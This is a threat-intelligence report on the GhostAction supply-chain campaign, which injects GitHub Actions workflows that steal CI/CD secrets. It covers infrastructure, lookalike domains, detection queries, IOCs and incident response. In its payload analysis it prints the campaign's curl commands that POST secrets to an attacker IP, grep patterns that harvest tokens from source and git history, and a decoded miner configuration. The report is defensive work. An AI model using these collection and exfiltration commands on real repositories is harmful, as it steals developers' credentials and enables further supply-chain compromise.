OpenSourceMalware has identified a new stage in the ongoing "GhostAction" malicious campaign that GitGuardian originally identified in 2025. This latest evolution appears to be an escalation and used two new domains targeting GitHub and GitLab.
The GhostAction campaign is a continuing supply-chain campaign in which attackers compromise GitHub accounts and inject malicious Actions workflows across every repository those accounts can modify. Triggered by pushes or manual execution, the workflows steal CI/CD secrets—including package-publishing, cloud, GitHub, and AI-service credentials—and exfiltrate them to attacker-controlled infrastructure. Later variants expanded collection by scanning repository contents and complete git history, recovering credentials that developers believed had been deleted. GitGuardian (https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack- returns/)
Earlier today Socket and StepSecurity subsequently traced a renewed, highly automated wave to compromised maintainers whose access exposed hundreds of repositories, including prominent projects and long-dormant codebases. Their findings show that GhostAction remains an active account-takeover and credential-theft operation: attackers enumerate all writable repositories, push workflows directly without review, trigger executions, and use stolen publishing or cloud secrets to enable further supply-chain compromise.
The established GhostAction payload reads specifically named GitHub Actions secrets and sends them to attacker infrastructure. The newer .github/workflows/security-audit.yml variant also searches the complete checkout and git history for credential-shaped strings, captures contextual lines surrounding AWS keys, and POSTs the combined results over unencrypted HTTP to 193.32.204.199/?c=monami.
Responders must assume exposure of active Actions secrets and credentials previously committed and later deleted. Removing the workflow does not revoke stolen credentials, invalidate the GitHub token used to alter the repository, or address packages, images, releases, and deployments produced during the compromise.
Early Warning: A Possible New Developer-Targeting Wave
Two newly registered, code-hosting-themed domains may signal the next phase of developer targeting. my-gitlab.com was registered on September 22, 2026, followed 17 days later by my-github.com. The domains share the exact my-<major code-host>.com construction and the parallel <brand>.my-<brand>.com form. my-github.com points directly to the active GhostAction collector IP; gitlab.my-gitlab.com hosts an apparent GitLab service on separate AWS infrastructure. Common ownership is not yet proven, but the naming, timing, and developer-facing services justify early monitoring for phishing, malicious clone URLs, token theft, CI configuration abuse, and payload delivery.
The infrastructure suggests a possible shift from conspicuous IP-address collectors toward domains designed to look familiar to developers:
my-gitlab.com registered 2026-09-22
└── gitlab.my-gitlab.com
my-github.com registered 2026-10-09
└── github.my-github.com
This pattern could support several attacks against developers: GitHub or GitLab credential phishing, OAuth or personal-access-token theft, malicious repository clone instructions, fake API endpoints, poisoned package or release downloads, runner registration, and CI/CD secret collection. These are forecast scenarios derived from the naming and exposed services; they have not all been observed.
my-github.com is the higher-confidence indicator because it resolves directly to 193.32.204.199, the current GhostAction exfiltration and scanning host. It also has wildcard DNS, allowing whoever controls the domain to use convincing hostnames without publishing individual records. my-gitlab.com is a lower-confidence watchlist domain: its configured gitlab.my-gitlab.com hostname resolves to an AWS EC2 address in Hong Kong where passive Shodan data identifies GitLab and nginx on ports 80 and 443.
The pair is not technically attributed to one operator. They use different registrars, registrant records, Cloudflare nameserver pairs, IP addresses, ASNs, and DNS designs, and no shared certificate or account artifact has been recovered. Defenders should nevertheless hunt and monitor both domains now because waiting for confirmed victim telemetry would forfeit the value of the early warning.
Recommended monitoring:
- DNS, proxy, browser, email, and endpoint events containing either apex domain or any subdomain;
- Git remotes, package metadata, documentation, workflow files, and shell history referencing either domain;
- authentication pages, OAuth redirects, personal-access-token prompts, runner-registration instructions, and clone URLs using the domains;
- outbound connections from developer workstations, CI runners, build systems, and package-publishing hosts;
- future DNS, certificate, hosting, and repository changes that create a direct link between the two domains.
Threat Overview
Attribute
Value
Threat
GhostAction
Type
CI/CD credential theft and software supply-chain intrusion
Platform
GitHub and GitHub Actions
Severity
Critical where workflows can access publishing, cloud, or deployment secrets
First documented
September 2025
Current endpoint
193.32.204.199 over HTTP
Files
github_actions_security.yml, security-check.yml, security-audit.yml
Triggers
push, workflow_dispatch
Discovery
The investigation began with claudecord. PyPI version 0.3.2 contains .github/workflows/github_actions_security.yml, which POSTs named deployment, npm, and PyPI secrets to http://193.32.204.199. Its SHA-256 is:
7fbd40446a82c77b23432c6ab73bd8595c98e90e4f4a473198b4d1256f3e8c4b
The claimed upstream, kanavdhanda/claudeCord, shows the initial implant in commit a69f8c4, followed two seconds later by Trigger security scan. Commit dd08e03 added .github/workflows/security-audit.yml the next day. Commit 7e03c5a later removed the remaining malicious workflow.
GitGuardian reported 772 affected repositories between August 31 and September 30. OpenSourceMalware can currently recover 717 through that cutoff and 790 through October 9. Repositories and commits may disappear after disclosure, while injections continued after GitGuardian’s window; the present dataset is therefore a reproducible public lower bound.
October 8 Mass Injection
Socket and StepSecurity resolved the newest activity to two compressed sweeps:
UTC window
Compromised account
Repositories
Detail
13:20–13:44
kitao
27
kitao/pyxel received one add and two update commits
21:10–21:26
henrywoo
318
39 source repositories, 279 forks, plus uber/athenadriver
Total
2 accounts
346
Automated enumeration of writable repositories
The sweep included active projects and repositories dormant for roughly a decade, supporting automated enumeration rather than project selection. kitao/pyxel had approximately 18,420 stars at Socket’s collection time. The Uber-owned uber/athenadriver repository was reachable because its original author retained write access after the project moved under the Uber organization.
The athenadriver injection went directly to master without a pull request or review and used the legitimate maintainer identity as author and committer. StepSecurity reports that the commit was unsigned. Author identity therefore provides weak detection when a valid credential is abused; content, review state, burst timing, push path, and runner egress are stronger signals.
Socket observed successful executions and found the workflow still present on default branches it checked on October 9. It had not observed malicious PyPI or crates.io releases attributable to this wave at publication time. That narrows observed impact but does not reduce the need to rotate publishing credentials.
Infrastructure
Period
Endpoint
Reported repositories
September 2025
bold-dhawan.45-139-104-115.plesk.page
~900 total for the wave
September 2025
carte-avantage.com
Included above
September 2025
objective-hopper.45-139-104-115.plesk.page
Included above
Oct–Dec 2025; March 2026
170.39.218.2
~75
Nov 2025; March–April 2026
*.oast.fun
~250
Aug–Sept 2026
193.32.204.199
772 reported
September 2026
193.32.204.199:3000/api/workflow/receive?inj=<id>
7
October 2026
193.32.204.199/?c=monami
Unresolved
StepSecurity places the current IP in honeypot telemetry on September 4, 2026 and in an infected public repository on September 5. Those dates provide an earlier investigation boundary than the major public injection bursts.
Infrastructure Reuse Beyond GhostAction
Dedicated infrastructure research found that 193.32.204.199 is also an active malicious internet scanner. GreyNoise, Shodan, OTX, SCARD, SANS ISC, and BlockList.de independently observed scanning, brute-force, web probing, or honeypot traffic. A SANS daily view recorded 11,286 probes to TCP/8080, while SCARD recorded 413 events dominated by suspicious web-scanner user agents. In incident response, distinguish inbound scanning from this IP from outbound GitHub-runner traffic to it; the latter is direct evidence of workflow exfiltration.
The legacy IP 45.139.104.115 has 389 OTX passive-DNS records spanning a phishing-heavy neighborhood. Recurring themes include Ameli/Carte Vitale, government fines, parcel delivery, Netflix, banking, and SNCF. carte-avantage.com was independently reported as an SNCF payment-card phishing site before its 2025 GhostAction use. This establishes multi-purpose malicious use of the infrastructure but does not prove that one operator controlled every co-hosted domain.
Current IP ownership and exposure
RIPE RDAP assigns 193.32.204.0/24 to the object vcyber, with Vigilant Cyber SAS as the registered organization and abuse@vigilantcyber.top as the abuse contact. The prefix is currently announced by AS153622, Madina IT. Commercial geolocation sources variously place the address in Helsinki, Istanbul, or Turkey. These records describe allocation, routing, and database-derived location respectively; none establishes where the GhostAction operator resides.
Shodan InternetDB observed OpenSSH 8.9p1 on TCP/22, Apache 2.4.52 on TCP/80, and TCP/8900. URLScan independently recorded http://193.32.204.199/c/ returning Apache 2.4.52 on Ubuntu. Version-derived CVEs in Shodan are exposure hypotheses and do not prove exploitability.
The scanning evidence is independent of the GitHub campaign:
Source
Observation
GreyNoise
noise=true, classification=malicious, last seen October 8
Shodan
scanner tag
OTX
50 pulses covering HTTP scanning, TCP/8080, brute force, and multi-protocol honeypots
68 attacks across 8 reports
SCARD
413 events; surfaced signature dominated by suspicious web-scanner user agents
SANS ISC
11,286 TCP/8080 probes in a daily top-scanner view
Feed tags such as Mirai, Mozi, WannaCry, or ransomware are not proof that the host ran those malware families. Several OTX pulses are bulk honeypot feeds whose names describe the monitored threat set. The supported finding is that the same IP used for GhostAction exfiltration was generating broad hostile scanning and probing traffic.
my-github.com: same-day domain on the current collector
my-github.com is a new and highly relevant pivot on the active GhostAction IP:
Property
Observation
Registered
2026-10-09T09:50:00Z
Registrar
Dynadot Inc., IANA ID 472
Registrant
Not disclosed in public RDAP
Expiration
2027-10-09
Nameservers
kianchau.ns.cloudflare.com, selah.ns.cloudflare.com
Current A record
193.32.204.199
DNSSEC
Not signed in observed registration data
The domain was registered on the day this infrastructure was being publicly investigated and uses a name that impersonates or invokes GitHub. It does not use Cloudflare’s reverse proxy in the observed A record; DNS resolves directly to the GhostAction collector. Public scan reporting associated the domain with Vigilant Cyber hosting and observed a valid TLS presentation.
URLScan submitted https://my-github.com/SDRVuhYw at 15:48 UTC on October 9. The observed navigation finished at a YouTube Rickroll URL. That behavior may represent operator taunting, a disposable redirect, an unrelated tenant, or researcher activity after disclosure. It is not evidence of credential phishing by itself.
The timing, brand-related name, and exact A-record overlap make my-github.com a high-priority indicator and pivot. There is still no direct workflow, account, registrar, or server-side evidence proving that the GhostAction operator registered it. The report therefore classifies it as suspicious infrastructure associated by IP, operator attribution unresolved.
Hunt the domain in DNS, proxy, email, certificate, and GitHub content telemetry:
my-github.com
*.my-github.com
"my-github.com" path:.github/workflows
"193.32.204.199" "my-github.com"
Any outbound GitHub runner connection to my-github.com should be investigated as potential campaign adaptation even if the workflow no longer contains the literal IP.
Four reported labels—ghassets.my-github.com, github.my-github.com, api.my-github.com, and gh.my-github.com—also resolve to 193.32.204.199. None currently has an AAAA, CNAME, or TXT record, and no exact public URLScan capture or OTX passive-DNS history was found for them.
Random control labels also resolve to the same address with the same TTL, confirming wildcard DNS for *.my-github.com. The names are semantically consistent with GitHub impersonation, but DNS resolution does not prove they are separately configured services: any invented label resolves. Count the apex as the infrastructure node, retain the four surfaced labels as hunt terms, and require HTTP Host, TLS SNI, certificate, email, workflow, or victim telemetry before asserting active use of an individual subdomain.
ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com
Related GitLab-themed domain
my-gitlab.com was registered on September 22, 2026, 17 days before my-github.com. It follows the same my-<code-host>.com naming pattern, making it a useful pivot, but current infrastructure does not connect it to GhostAction. It uses Gname rather than Dynadot, has a different Cloudflare nameserver pair, and does not resolve to 193.32.204.199.
The apex currently has no address or mail records. The explicitly configured gitlab.my-gitlab.com hostname resolves to 18.167.164.26, an AWS EC2 address in Hong Kong. Shodan InternetDB reports ports 80 and 443 with GitLab and nginx fingerprints, consistent with a functioning self-hosted GitLab service. Random subdomain controls return NXDOMAIN, so this domain does not use the wildcard behavior seen on my-github.com. Public URLScan, OTX, search, and Certificate Transparency checks produced no malicious or campaign-specific evidence.
Classify my-gitlab.com and gitlab.my-gitlab.com as watchlist indicators: relationship unconfirmed. Their naming and timing warrant monitoring, but treating them as confirmed GhostAction infrastructure would exceed the evidence. Useful next pivots are workflow references, login or clone URLs in endpoint telemetry, certificate reuse, registrar artifacts, victim reports, and future passive-DNS changes.
The strongest connection between my-gitlab.com and my-github.com is the exact my-<major code-host>.com naming construction combined with registration 17 days apart. There is also a parallel <brand>.my-<brand>.com form: gitlab.my-gitlab.com is explicitly configured, while github.my-github.com resolves through the GitHub-themed domain’s wildcard. Tests of analogous GitHub, GitLab, API, asset, registry, package, authentication, and login labels under my-gitlab.com returned NXDOMAIN except for gitlab.my-gitlab.com; the evidence therefore shows a strong lexical pattern, not a mirrored subdomain deployment.
No operator-specific link was found: the domains use different registrars, privacy/registrant records, Cloudflare nameserver pairs, SOA serials, IP addresses, ASNs, DNS designs, and hosting providers. No shared certificate, passive observation, or relevant indexed co-occurrence was identified. Cloudflare DNS, one-year registration, transfer locks, and disabled DNSSEC are common defaults and carry little attribution weight. The relationship remains a credible hypothesis until a shared token, certificate or key, origin, account, repository reference, payload, or victim-side sequence is recovered.
Legacy IP and phishing-platform overlap
ARIN assigns 45.139.104.0/24 to 49.3 Networking LLC, and RIPE routing data shows AS399979 announcing it throughout the relevant 2024–2026 period. OTX passive DNS produced 389 records representing 355 normalized names. At minimum, keyword clustering found 68 parcel/postal impersonation names, 29 French health/Ameli/Carte Vitale names, 13 government/fine/tax names, nine Netflix/streaming names, and seven banking/payment/insurance names.
Examples include dhl-colis-track.com, chronopost-tracker.com, ameli-remboursement.com, fisc-gouv.info, netflix-secure-france.com, client-axa.info, and leetchi-verif.com. Independent reputation sources classify several neighbors as phishing, spam, possible malware, or sinkholed infrastructure. This establishes phishing-heavy hosting, though shared hosting prevents assigning every name to GhostAction.
objective-hopper.45-139-104-115.plesk.page still resolves to the legacy IP. bold-dhawan.45-139-104-115.plesk.page currently returns NXDOMAIN. The adjective-surname labels are consistent with automatically generated Plesk preview hostnames and do not reveal a human registrant.
carte-avantage.com: phishing-to-GhostAction crossover
Public victim reports describe sncf.carte-avantage.com impersonating SNCF Connect and offering a €49 discount card for €2.45. Reports state that the site collected identity and payment-card data while most non-payment navigation was inert. GitGuardian later found carte-avantage.com used as a GhostAction exfiltration endpoint.
Current RDAP shows a Dynadot registration from August 15, 2025, an undisclosed registrant, and redemption status after expiration in August 2026. The domain currently returns NXDOMAIN. It received Let’s Encrypt certificates immediately after the 2025 registration, resolved to 45.139.104.115 by August 17, and appeared in GhostAction the following month. That sequence strongly ties the 2025 registration instance to the legacy campaign infrastructure.
Archives and Certificate Transparency show older domain lives in 2018, 2021–2022, and 2024. The 2025 creation date reflects re-registration rather than first-ever use. Consequently, the 2022/2024 SNCF phishing operator and 2025 GhostAction operator cannot be assumed identical without historical WHOIS, registrar-payment, or server-control evidence. Public RDAP does not expose a defensible individual owner.
Full ownership, routing, passive-DNS, certificate, scanning, and attribution analysis is in ghostaction_infrastructure_2026-10-09.md.
Attack Chain
- Valid repository access: the actor uses access associated with the victim identity. Displayed authorship alone cannot distinguish authorized work from token abuse.
- Workflow injection: a security-themed file is written below - .github/workflows/.
- Execution: the injection push can trigger the newly added workflow; later pushes retrigger it, and - workflow_dispatchpermits manual execution.
- Retriggering: an inert timestamp comment is appended to - README.md, creating another push.
- Collection: named Actions secrets are expanded; the new variant also scans current and historical source.
- Exfiltration: - curl --data-binarysends a victim-labelled multiline record over HTTP.
GitHub resolves ${{ secrets.NAME }} before Bash receives the script. Missing secrets become empty strings; existing values become command data. Log masking does not prevent the runner from transmitting the underlying value.
Payload Evolution
Targeted-secret workflow
The PyPI artifact contains the established collector:
curl -s -X POST -d 'DEPLOY_HOST=${{ secrets.DEPLOY_HOST }}&DEPLOY_SSH_KEY=${{ secrets.DEPLOY_SSH_KEY }}&NPM_TOKEN=${{ secrets.NPM_TOKEN }}&PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' http://193.32.204.199
Secret names vary by victim, indicating that the actor inspected existing workflow or configuration references and generated a tailored collector. It cannot enumerate stored secret values; it references names learned beforehand and relies on Actions expression expansion.
New security-audit.yml
The latest version combines three collectors:
- explicit repository-specific Actions secrets;
- regex matches in the checked-out tree;
- regex matches and contextual lines from all reachable git patches.
It sends results to http://193.32.204.199/?c=monami. The query value may label a campaign or collector version; its server-side meaning is unresolved.
Full-history checkout
- uses: actions/checkout@v4
with:
fetch-depth: 0
fetch-depth: 0 obtains complete reachable history instead of a shallow checkout. Credentials deleted from the visible branch remain available to git log -p --all. The setting is legitimate by itself and becomes high-risk when correlated with secret regexes and an unrelated external POST.
Victim identity and direct secrets
out="REPO=$GITHUB_REPOSITORY"
[ -n "CARGO_REGISTRY_TOKEN=${{ secrets.CARGO_REGISTRY_TOKEN }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}&PYPI_PASSWORD=${{ secrets.PYPI_PASSWORD }}&PYPI_USERNAME=${{ secrets.PYPI_USERNAME }}" ] && out="$out&..."
GITHUB_REPOSITORY identifies the victim. Because literal parameter names remain even when all secrets are empty, the -n condition is always true. The example targets Rust and Python publishing plus a general access token; observed lists also include cloud, container, SSH, database, bot, npm, PyPI, and GitHub credentials.
Current-tree collection
grepped=$(grep -rEiho "..." --exclude-dir=.git . 2>/dev/null | sort -u)
-r scans recursively, -E enables extended regexes, -i ignores case, -h removes filenames, and -o returns only matches. Errors are hidden and results deduplicated. Targeted families include:
Pattern
Credential
AKIA..., ASIA...
AWS long-term and STS access-key IDs
sk-ant-...
Anthropic
sk-proj-...
OpenAI project key
sk-or-...
OpenRouter
ghp_..., github_pat_...
GitHub PATs
glpat-...
GitLab PAT
AIza...
Google API key
xox[baprs]-...
Slack token
SG.<part>.<part>
SendGrid key
secret_access_key...
AWS secret access key assignment
aws_session_token...
AWS session-token assignment
The regex uses PCRE non-capturing groups such as (?:v1-)? with grep -E, which implements POSIX ERE. Behavior may vary and produce warnings or missed matches; 2>/dev/null hides failures. This defect reduces reliability but does not neutralize ordinary ERE branches.
Git-history collection
gl=$(git log -p --all 2>/dev/null | head -200000)
hist=$(echo "$gl" | grep -oiE "..." | sort -u | head -300)
git log -p --all emits metadata and diffs for every reachable reference. The actor retains up to 200,000 output lines and 300 unique matches. Deleted lines are included, so credentials removed from current source can still be collected. Large repositories bias toward recent history because git normally walks newest commits first.
AWS context collection
ctx=$(grep -rEi -B2 -A2 "AKIA...|ASIA..." --exclude-dir=.git . 2>/dev/null | head -150)
hctx=$(echo "$gl" | grep -Ei -B2 -A2 "AKIA...|ASIA..." | head -150)
These commands collect two surrounding lines rather than only the key ID. Context may disclose the paired secret key, region, role, account, bucket, hostname, username, or other credentials. Current and historical context are each capped at 150 lines and wrapped with distinctive AKIA_CTX_START and AKIA_CTX_END markers.
Exfiltration
curl -s -m 20 -X POST --data-binary "$full" "http://193.32.204.199/?c=monami" || true
--data-binary preserves newlines. The body contains repository identity, named secrets, AWS context, current matches, and historical matches. Plain HTTP exposes stolen data in transit. -s suppresses output, -m 20 limits delay, and || true prevents a failed POST from failing the step. The final non-empty check is always satisfied because the body begins with the repository name, so every run sends at least a victim beacon.
GitHub Hunting Queries
High-confidence infrastructure searches
The most effective primary search quotes the IP and scopes the result set to executable GitHub Actions workflow paths, independent of filename:
"193.32.204.199" path:.github/workflows
https://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code
This query detects github_actions_security.yml, security-check.yml, security-audit.yml, and renamed copies in one pass. Quoting the IP requires the complete literal indicator, while the path constraint removes documentation, IOC feeds, issue templates, and non-executable source files that mention the campaign. Results still require content review because defenders may intentionally commit detections or blocked indicators inside workflow files.
Use the following searches as broader discovery and filename-specific pivots:
193.32.204.199 language:YAML
path:github_actions_security.yml 193.32.204.199
path:security-audit.yml 193.32.204.199
path:security-check.yml "193.32.204.199:3000/api/workflow/receive"
Version-specific payload searches
path:.github/workflows "AKIA_CTX_START" "git log -p --all"
path:.github/workflows "AKIA_CTX_END" "--data-binary"
path:security-audit.yml "?c=monami"
path:.github/workflows "head -200000" "head -300" "git log -p --all"
path:.github/workflows "aws_session_token" "fetch-depth: 0" "--data-binary"
path:.github/workflows/github_actions_security.yml "Prepare Cache Busting" "send-secrets"
Historical infrastructure
path:.github/workflows "bold-dhawan.45-139-104-115.plesk.page"
path:.github/workflows "objective-hopper.45-139-104-115.plesk.page"
path:.github/workflows "carte-avantage.com"
path:.github/workflows "170.39.218.2"
path:.github/workflows "oast.fun" "send-secrets"
Commit history
"Add Github Actions Security workflow"
"Update Github Actions Security workflow"
"Add security check workflow"
"Add security audit workflow"
"Update security audit workflow"
"Trigger security scan"
Phrase search also returns longer messages and bodies. Fetch the file at each returned SHA and verify infrastructure or a distinctive content marker before assigning it to the campaign.
Detection
Confidence
Guidance
Known IP plus malicious workflow path
Very high
Direct campaign correlation
AKIA_CTX_START plus git log -p --all
Very high
Distinctive latest collector
?c=monami plus --data-binary
Very high
Version-specific route
Exact commit message alone
Medium
Validate file at SHA
fetch-depth: 0 plus secret regexes
Low–medium
Legitimate scanners do this
security-audit.yml filename alone
Low
Common legitimate filename
October 8 Account and Repository Pivots
user:henrywoo path:.github/workflows/security-audit.yml
user:kitao path:.github/workflows/security-audit.yml
repo:uber/athenadriver path:.github/workflows/security-audit.yml
repo:kitao/pyxel path:.github/workflows/security-audit.yml
Treat fork results separately from source repositories. Socket counted 279 affected forks under henrywoo; a committed workflow in a fork becomes an execution risk when Actions is enabled and a qualifying event gives it access to that fork’s secret context.
Validated Repository Scope
Evidence
Repositories
Validation
Added main workflow
683
Exact message; historical file and IP verified
Updated main workflow
272
Exact message; historical file and IP verified
Port-3000 variant
7
Historical file and endpoint verified
Deduplicated set
790
Union of validated evidence
Supporting datasets are ghostaction_repositories_summary.csv, ghostaction_affected_repositories.csv, and ghostaction_trigger_commits_sample.csv beside this report.
MITRE ATT&CK
Tactic
Technique
ID
Initial Access
Valid Accounts: Cloud Accounts
T1078.004
Initial Access
Compromise Software Supply Chain
T1195.002
Execution
Unix Shell
T1059.004
Persistence
Event Triggered Execution
T1546
Credential Access
Credentials In Files
T1552.001
Credential Access
Private Keys
T1552.004
Discovery
File and Directory Discovery
T1083
Collection
Data from Local System
T1005
Command and Control
Web Protocols
T1071.001
Exfiltration
Exfiltration Over C2 Channel
T1041
Public evidence does not establish how the original GitHub credentials were obtained.
Indicators of Compromise
193.32.204.199
http://193.32.204.199/?c=monami
http://193.32.204.199:3000/api/workflow/receive?inj=<id>
my-github.com
*.my-github.com
ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com
https://my-github.com/SDRVuhYw
170.39.218.2
45.139.104.115
bold-dhawan.45-139-104-115.plesk.page
objective-hopper.45-139-104-115.plesk.page
carte-avantage.com
*.oast.fun
.github/workflows/github_actions_security.yml
.github/workflows/security-check.yml
.github/workflows/security-audit.yml
Prepare Cache Busting
send-secrets
AKIA_CTX_START
AKIA_CTX_END
git log -p --all 2>/dev/null | head -200000
curl -s -m 20 -X POST --data-binary
Filenames alone are not malicious indicators; correlate them with infrastructure or behavior.
Related watchlist indicators—not attributed to GhostAction
my-gitlab.com
gitlab.my-gitlab.com
18.167.164.26
The IP is shared cloud infrastructure and should only be used with the hostname or other corroborating context.
Separate DevOpsGPT Miner
Commit 614a565 modifies Dockerfile, run.sh, and two scheduler files to install and persist XMRig as /usr/local/bin/pyworker. Static XOR decoding with devops2024 yields:
pool.supportxmr.com:3333
832eKef1fNRTQdiJeJzsvkMMsogMp22FR2FLX1oaV5BxGfoMcJvkcbFgWgNRyNfsE19D9pdM1zdU7D9kRLdJbM5rU1vjfcL
worker1
--cpu-max-threads-hint=30
--donate-level=0
The five expected fields are present, differing from GitGuardian’s conclusion that the configuration was truncated. The miner predates GhostAction in this repository and uses different, tailored tradecraft. Treat it as separate activity through a shared compromised identity unless further evidence connects the operators.
Incident Response
- Disable Actions temporarily and preserve workflows, run IDs, logs, commits, audit logs, and package/release records.
- Revoke GitHub PATs, OAuth grants, App credentials, deploy keys, and sessions associated with the compromised identity.
- Remove malicious workflows from executable branches and tags; preserve evidence separately.
- Block campaign infrastructure without contacting it.
- Rotate every named Actions secret, then search and rotate matching credentials in full git history.
- Prioritize source-control, registry, cloud, SSH, deployment, database, and container credentials.
- Audit packages, releases, images, and deployments produced during the compromise window.
- Rebuild trusted artifacts from a verified pre-compromise commit in a clean environment.
Harden repositories with protected branches, reviewed workflow changes, .github/workflows/** ownership rules, least-privilege organization secrets, short-lived credentials, and cloud OIDC. Alert when workflows combine full-history checkout, git-diff scanning, credential regexes, and outbound network clients.
Require approval for new or modified workflows wherever repository policy permits it. StepSecurity reports that workflow approval was the control observed stopping exfiltration in this wave. Apply runner egress allowlists as a second layer: the collector connects directly to a raw IP on ports 80 or 3000, producing no DNS lookup for domain-only controls to inspect. Historical network telemetry for those destinations can identify the repository, workflow, job, and step that attempted collection.
Limitations
- Deleted, private, force-pushed, and unindexed repositories are outside the recoverable public set.
- The prevalence of the newest exact - security-audit.ymlvariant remains unresolved because its generic commit message creates substantial noise.
- Workflow content proves attempted collection, not successful delivery or credential validity.
- c=monamiand- inj=<id>appear to route or label collection; attacker infrastructure was not contacted.
- Additional malware may exist under unrelated names or commit messages.
References
- GreyNoise record for - 193.32.204.199
- SNCF phishing reports for - carte-avantage.com
- Verisign RDAP for - carte-avantage.com
- GitHub search: quoted IOC under - .github/workflows
Report suspicious packages and repositories to OpenSourceMalware.com.
Report generated by the OpenSourceMalware Team.